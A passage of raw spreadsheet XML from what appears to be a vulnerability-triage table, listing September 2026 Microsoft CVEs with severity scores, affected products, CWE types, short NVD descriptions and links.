t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69386</t></is></c></row><row r="143"><c r="A143" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B143" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C143" s="5" t="inlineStr"><is><t>CVE-2026-69434</t></is></c><c r="D143" s="5" t="n"><v>8.800000000000001</v></c><c r="E143" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F143" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G143" s="5" t="inlineStr" /><c r="H143" s="5" t="n"><v>0.008</v></c><c r="I143" s="5" t="inlineStr" /><c r="J143" s="5" t="inlineStr" /><c r="K143" s="5" t="inlineStr" /><c r="L143" s="5" t="inlineStr" /><c r="M143" s="5" t="inlineStr" /><c r="N143" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O143" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P143" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q143" s="5" t="inlineStr" /><c r="R143" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S143" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows URL Moniker allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T143" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69434</t></is></c></row><row r="144"><c r="A144" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B144" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C144" s="5" t="inlineStr"><is><t>CVE-2026-69439</t></is></c><c r="D144" s="5" t="n"><v>8.800000000000001</v></c><c r="E144" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F144" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G144" s="5" t="inlineStr" /><c r="H144" s="5" t="n"><v>0.007</v></c><c r="I144" s="5" t="inlineStr" /><c r="J144" s="5" t="inlineStr" /><c r="K144" s="5" t="inlineStr" /><c r="L144" s="5" t="inlineStr" /><c r="M144" s="5" t="inlineStr" /><c r="N144" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O144" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P144" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q144" s="5" t="inlineStr" /><c r="R144" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S144" s="5" t="inlineStr"><is><t>Heap-based</t></is></c><c r="T144" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69439</t></is></c></row><row r="145"><c r="A145" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B145" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C145" s="5" t="inlineStr"><is><t>CVE-2026-69442</t></is></c><c r="D145" s="5" t="n"><v>8.800000000000001</v></c><c r="E145" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F145" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G145" s="5" t="inlineStr" /><c r="H145" s="5" t="n"><v>0.008</v></c><c r="I145" s="5" t="inlineStr" /><c r="J145" s="5" t="inlineStr" /><c r="K145" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L145" s="5" t="inlineStr" /><c r="M145" s="5" t="inlineStr" /><c r="N145" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O145" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P145" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q145" s="5" t="inlineStr" /><c r="R145" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S145" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Office allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T145" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69442</t></is></c></row><row r="146"><c r="A146" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B146" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C146" s="5" t="inlineStr"><is><t>CVE-2026-69461</t></is></c><c r="D146" s="5" t="n"><v>8.800000000000001</v></c><c r="E146" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F146" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G146" s="5" t="inlineStr" /><c r="H146" s="5" t="n"><v>0.008</v></c><c r="I146" s="5" t="inlineStr" /><c r="J146" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1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6" s="5" t="inlineStr" /><c r="M146" s="5" t="inlineStr" /><c r="N146" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O146" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P146" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q146" s="5" t="inlineStr" /><c r="R146" s="5" t="inlineStr"><is><t>CWE-121</t></is></c><c r="S146" s="5" t="inlineStr"><is><t>Stack-based buffer overflow in Windows NTFS allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T146" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69461</t></is></c></row><row r="147"><c r="A147" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B147" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C147" s="5" t="inlineStr"><is><t>CVE-2026-69464</t></is></c><c r="D147" s="5" t="n"><v>8.800000000000001</v></c><c r="E147" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F147" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G147" s="5" t="inlineStr" /><c r="H147" s="5" t="n"><v>0.008999999999999999</v></c><c r="I147" s="5" t="inlineStr" /><c r="J147" s="5" t="inlineStr"><is><t>microsoft:sharepoint</t></is></c><c r="K147" s="5" t="inlineStr"><is><t>microsoft:sharepoint_server</t></is></c><c r="L147" s="5" t="inlineStr" /><c r="M147" s="5" t="inlineStr" /><c r="N147" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O147" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P147" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q147" s="5" t="inlineStr" /><c r="R147" s="5" t="inlineStr"><is><t>CWE-250</t></is></c><c r="S147" s="5" t="inlineStr"><is><t>Execution with unnecessary privileges in Microsoft Office SharePoint allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T147" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69464</t></is></c></row><row r="148"><c r="A148" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B148" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C148" s="5" t="inlineStr"><is><t>CVE-2026-69465</t></is></c><c r="D148" s="5" t="n"><v>8.800000000000001</v></c><c r="E148" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F148" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G148" s="5" t="inlineStr" /><c r="H148" s="5" t="n"><v>0.008</v></c><c r="I148" s="5" t="inlineStr" /><c r="J148" s="5" t="inlineStr"><is><t>microsoft:sharepoint</t></is></c><c r="K148" s="5" t="inlineStr"><is><t>microsoft:sharepoint_server</t></is></c><c r="L148" s="5" t="inlineStr" /><c r="M148" s="5" t="inlineStr" /><c r="N148" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O148" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P148" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q148" s="5" t="inlineStr" /><c r="R148" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S148" s="5" t="inlineStr"><is><t>Missing authorization in Microsoft Office SharePoint allows an authorized attacker to execute code over a network.</t></is></c><c r="T148" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69465</t></is></c></row><row r="149"><c r="A149" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B149" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C149" s="5" t="inlineStr"><is><t>CVE-2026-69485</t></is></c><c r="D149" s="5" t="n"><v>8.800000000000001</v></c><c r="E149" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F149" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G149" s="5" t="inlineStr" /><c r="H149" s="5" t="n"><v>0.008999999999999999</v></c><c r="I149" s="5" t="inlineStr" /><c r="J149" s="5" t="inlineStr" /><c r="K149" s="5" t="inlineStr" /><c r="L149" s="5" t="inlineStr" /><c r="M149" s="5" t="inlineStr" /><c r="N149" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O149" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P149" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q149" s="5" t="inlineStr" /><c r="R149" s="5" t="inlineStr"><is><t>CWE-908</t></is></c><c r="S149" s="5" t="inlineStr"><is><t>Use of uninitialized resource in Remote Desktop Client allows an authorized attacker to execute code over a network.</t></is></c><c r="T149" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69485</t></is></c></row><row r="150"><c r="A150" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B150" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C150" s="5" t="inlineStr"><is><t>CVE-2026-69494</t></is></c><c r="D150" s="5" t="n"><v>8.800000000000001</v></c><c r="E150" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F150" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G150" s="5" t="inlineStr" /><c r="H150" s="5" t="n"><v>0.008</v></c><c r="I150" s="5" t="inlineStr" /><c r="J150" s="5" t="inlineStr" /><c r="K150" s="5" t="inlineStr" /><c r="L150" s="5" t="inlineStr" /><c r="M150" s="5" t="inlineStr" /><c r="N150" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O150" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P150" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q150" s="5" t="inlineStr" /><c r="R150" s="5" t="inlineStr"><is><t>CWE-122, CWE-125</t></is></c><c r="S150" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Event Logging Service allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T150" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69494</t></is></c></row><row r="151"><c r="A151" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B151" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C151" s="5" t="inlineStr"><is><t>CVE-2026-69495</t></is></c><c r="D151" s="5" t="n"><v>8.800000000000001</v></c><c r="E151" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F151" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G151" s="5" t="inlineStr" /><c r="H151" s="5" t="n"><v>0.008</v></c><c r="I151" s="5" t="inlineStr" /><c r="J151" s="5" t="inlineStr" /><c r="K151" s="5" t="inlineStr" /><c r="L151" s="5" t="inlineStr" /><c r="M151" s="5" t="inlineStr" /><c r="N151" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O151" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P151" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q151" s="5" t="inlineStr" /><c r="R151" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S151" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Event Logging Service allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T151" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69495</t></is></c></row><row r="152"><c r="A152" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B152" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C152" s="5" t="inlineStr"><is><t>CVE-2026-69499</t></is></c><c r="D152" s="5" t="n"><v>8.800000000000001</v></c><c r="E152" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F152" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G152" s="5" t="inlineStr" /><c r="H152" s="5" t="n"><v>0.008</v></c><c r="I152" s="5" t="inlineStr" /><c r="J152" s="5" t="inlineStr" /><c r="K152" s="5" t="inlineStr" /><c r="L152" s="5" t="inlineStr" /><c r="M152" s="5" t="inlineStr" /><c r="N152" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O152" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P152" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q152" s="5" t="inlineStr" /><c r="R152" s="5" t="inlineStr"><is><t>CWE-190</t></is></c><c r="S152" s="5" t="inlineStr"><is><t>Integer overflow or wraparound in Windows Imaging Component allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T152" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69499</t></is></c></row><row r="153"><c r="A153" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B153" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C153" s="5" t="inlineStr"><is><t>CVE-2026-69511</t></is></c><c r="D153" s="5" t="n"><v>8.800000000000001</v></c><c r="E153" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F153" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G153" s="5" t="inlineStr" /><c r="H153" s="5" t="n"><v>0.008</v></c><c r="I153" s="5" t="inlineStr" /><c r="J153" s="5" t="inlineStr" /><c r="K153" s="5" t="inlineStr" /><c r="L153" s="5" t="inlineStr" /><c r="M153" s="5" t="inlineStr" /><c r="N153" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O153" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P153" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q153" s="5" t="inlineStr" /><c r="R153" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S153" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Windows Media Foundation allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T153" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69511</t></is></c></row><row r="154"><c r="A154" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B154" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C154" s="5" t="inlineStr"><is><t>CVE-2026-69518</t></is></c><c r="D154" s="5" t="n"><v>8.800000000000001</v></c><c r="E154" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F154" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G154" s="5" t="inlineStr" /><c r="H154" s="5" t="n"><v>0.008</v></c><c r="I154" s="5" t="inlineStr" /><c r="J154" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K15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4" s="5" t="inlineStr" /><c r="M154" s="5" t="inlineStr" /><c r="N154" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O154" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P154" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q154" s="5" t="inlineStr" /><c r="R154" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S154" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Remote Desktop allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T154" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69518</t></is></c></row><row r="155"><c r="A155" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B155" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C155" s="5" t="inlineStr"><is><t>CVE-2026-69522</t></is></c><c r="D155" s="5" t="n"><v>8.800000000000001</v></c><c r="E155" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F155" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G155" s="5" t="inlineStr" /><c r="H155" s="5" t="n"><v>0.008</v></c><c r="I155" s="5" t="inlineStr" /><c r="J155" s="5" t="inlineStr" /><c r="K155" s="5" t="inlineStr" /><c r="L155" s="5" t="inlineStr" /><c r="M155" s="5" t="inlineStr" /><c r="N155" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O155" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P155" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q155" s="5" t="inlineStr" /><c r="R155" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S155" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Visual Studio allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T155" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69522</t></is></c></row><row r="156"><c r="A156" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B156" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C156" s="5" t="inlineStr"><is><t>CVE-2026-69529</t></is></c><c r="D156" s="5" t="n"><v>8.800000000000001</v></c><c r="E156" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F156" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G156" s="5" t="inlineStr" /><c r="H156" s="5" t="n"><v>0.005</v></c><c r="I156" s="5" t="inlineStr" /><c r="J156" s="5" t="inlineStr" /><c r="K156" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:access, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L156" s="5" t="inlineStr" /><c r="M156" s="5" t="inlineStr" /><c r="N156" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O156" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P156" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q156" s="5" t="inlineStr" /><c r="R156" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S156" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Office Access allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T156" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69529</t></is></c></row><row r="157"><c r="A157" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B157" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C157" s="5" t="inlineStr"><is><t>CVE-2026-69547</t></is></c><c r="D157" s="5" t="n"><v>8.800000000000001</v></c><c r="E157" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F157" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G157" s="5" t="inlineStr" /><c r="H157" s="5" t="n"><v>0.008999999999999999</v></c><c r="I157" s="5" t="inlineStr" /><c r="J157" s="5" t="inlineStr" /><c r="K157" s="5" t="inlineStr" /><c r="L157" s="5" t="inlineStr" /><c r="M157" s="5" t="inlineStr" /><c r="N157" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O157" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P157" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q157" s="5" t="inlineStr" /><c r="R157" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S157" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows DHCP Server allows an authorized attacker to execute code over a network.</t></is></c><c r="T157" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69547</t></is></c></row><row r="158"><c r="A158" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B158" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C158" s="5" t="inlineStr"><is><t>CVE-2026-69551</t></is></c><c r="D158" s="5" t="n"><v>8.800000000000001</v></c><c r="E158" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F158" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G158" s="5" t="inlineStr" /><c r="H158" s="5" t="n"><v>0.008999999999999999</v></c><c r="I158" s="5" t="inlineStr" /><c r="J158" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K158" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L158" s="5" t="inlineStr" /><c r="M158" s="5" t="inlineStr" /><c r="N158" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O158" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P158" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q158" s="5" t="inlineStr" /><c r="R158" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S158" s="5" t="inlineStr"><is><t>Use after free in Windows DNS allows an authorized attacker to execute code over a network.</t></is></c><c r="T158" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69551</t></is></c></row><row r="159"><c r="A159" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B159" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C159" s="5" t="inlineStr"><is><t>CVE-2026-69556</t></is></c><c r="D159" s="5" t="n"><v>8.800000000000001</v></c><c r="E159" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F159" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G159" s="5" t="inlineStr" /><c r="H159" s="5" t="n"><v>0.008</v></c><c r="I159" s="5" t="inlineStr" /><c r="J159" s="5" t="inlineStr" /><c r="K159" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t></is></c><c r="L159" s="5" t="inlineStr" /><c r="M159" s="5" t="inlineStr" /><c r="N159" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O159" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P159" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q159" s="5" t="inlineStr" /><c r="R159" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S159" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T159" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69556</t></is></c></row><row r="160"><c r="A160" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B160" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C160" s="5" t="inlineStr"><is><t>CVE-2026-69598</t></is></c><c r="D160" s="5" t="n"><v>8.800000000000001</v></c><c r="E160" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F160" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G160" s="5" t="inlineStr" /><c r="H160" s="5" t="n"><v>0.008</v></c><c r="I160" s="5" t="inlineStr" /><c r="J160" s="5" t="inlineStr" /><c r="K160" s="5" t="inlineStr" /><c r="L160" s="5" t="inlineStr" /><c r="M160" s="5" t="inlineStr" /><c r="N160" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O160" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P160" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q160" s="5" t="inlineStr" /><c r="R160" s="5" t="inlineStr"><is><t>CWE-131</t></is></c><c r="S160" s="5" t="inlineStr"><is><t>Incorrect calculation of buffer size in Windows iSCSI allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T160" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69598</t></is></c></row><row r="161"><c r="A161" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B161" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C161" s="5" t="inlineStr"><is><t>CVE-2026-69601</t></is></c><c r="D161" s="5" t="n"><v>8.800000000000001</v></c><c r="E161" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F161" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G161" s="5" t="inlineStr" /><c r="H161" s="5" t="n"><v>0.008</v></c><c r="I161" s="5" t="inlineStr" /><c r="J161" s="5" t="inlineStr" /><c r="K161" s="5" t="inlineStr" /><c r="L161" s="5" t="inlineStr" /><c r="M161" s="5" t="inlineStr" /><c r="N161" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O161" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P161" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q161" s="5" t="inlineStr" /><c r="R161" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S161" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Windows Media Foundation allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T161" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69601</t></is></c></row><row r="162"><c r="A162" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B162" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C162" s="5" t="inlineStr"><is><t>CVE-2026-69603</t></is></c><c r="D162" s="5" t="n"><v>8.800000000000001</v></c><c r="E162" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F162" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G162" s="5" t="inlineStr" /><c r="H162" s="5" t="n"><v>0.003</v></c><c r="I162" s="5" t="inlineStr" /><c r="J162" s="5" t="inlineStr" /><c r="K162" s="5" t="inlineStr" /><c r="L162" s="5" t="inlineStr" /><c r="M162" s="5" t="inlineStr" /><c r="N162" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O162" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P162" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q162" s="5" t="inlineStr" /><c r="R162" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S162" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Hyper-V allows an authorized attacker to execute code locally.</t></is></c><c r="T162" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69603</t></is></c></row><row r="163"><c r="A163" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B163" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C163" s="5" t="inlineStr"><is><t>CVE-2026-69614</t></is></c><c r="D163" s="5" t="n"><v>8.800000000000001</v></c><c r="E163" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F163" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G163" s="5" t="inlineStr" /><c r="H163" s="5" t="n"><v>0.008999999999999999</v></c><c r="I163" s="5" t="inlineStr" /><c r="J163" s="5" t="inlineStr" /><c r="K163" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:access, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L163" s="5" t="inlineStr" /><c r="M163" s="5" t="inlineStr" /><c r="N163" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O163" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P163" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q163" s="5" t="inlineStr" /><c r="R163" s="5" t="inlineStr"><is><t>CWE-121, CWE-20</t></is></c><c r="S163" s="5" t="inlineStr"><is><t>Stack-based buffer overflow in Microsoft Office Access allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T163" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69614</t></is></c></row><row r="164"><c r="A164" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B164" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C164" s="5" t="inlineStr"><is><t>CVE-2026-69628</t></is></c><c r="D164" s="5" t="n"><v>8.800000000000001</v></c><c r="E164" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F164" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G164" s="5" t="inlineStr" /><c r="H164" s="5" t="n"><v>0.008999999999999999</v></c><c r="I164" s="5" t="inlineStr" /><c r="J164" s="5" t="inlineStr" /><c r="K164" s="5" t="inlineStr" /><c r="L164" s="5" t="inlineStr" /><c r="M164" s="5" t="inlineStr" /><c r="N164" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O164" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P164" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q164" s="5" t="inlineStr" /><c r="R164" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S164" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows iSCSI allows an authorized attacker to execute code over a network.</t></is></c><c r="T164" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69628</t></is></c></row><row r="165"><c r="A165" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B165" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C165" s="5" t="inlineStr"><is><t>CVE-2026-69629</t></is></c><c r="D165" s="5" t="n"><v>8.800000000000001</v></c><c r="E165" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F165" 